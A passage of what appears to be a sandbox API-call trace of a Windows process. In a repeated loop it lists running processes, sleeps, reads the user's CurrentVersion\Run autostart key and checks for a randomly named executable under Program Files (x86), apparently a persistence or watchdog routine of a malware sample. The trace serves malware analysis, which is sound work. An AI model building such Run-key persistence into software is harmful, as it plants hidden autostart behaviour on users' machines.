SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.458] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.462] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.469] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.469] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.469] NtClose (Handle=0x14c) returned 0x0 [0176.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.469] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.469] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.469] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.469] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.474] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.509] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.509] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.509] NtClose (Handle=0x14c) returned 0x0 [0176.509] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.509] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.510] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.510] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.510] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.515] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.532] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.532] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.532] NtClose (Handle=0x14c) returned 0x0 [0176.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.532] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.532] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.532] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.533] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.537] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.546] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.546] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.546] NtClose (Handle=0x14c) returned 0x0 [0176.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.546] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.546] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.547] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.547] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.551] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.589] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.589] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.589] NtClose (Handle=0x14c) returned 0x0 [0176.589] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.589] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.589] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.589] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.589] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.589] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.594] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.608] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.608] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.608] NtClose (Handle=0x14c) returned 0x0 [0176.608] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.608] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.608] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.609] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.609] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.609] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.613] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.625] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.625] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.625] NtClose (Handle=0x14c) returned 0x0 [0176.625] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 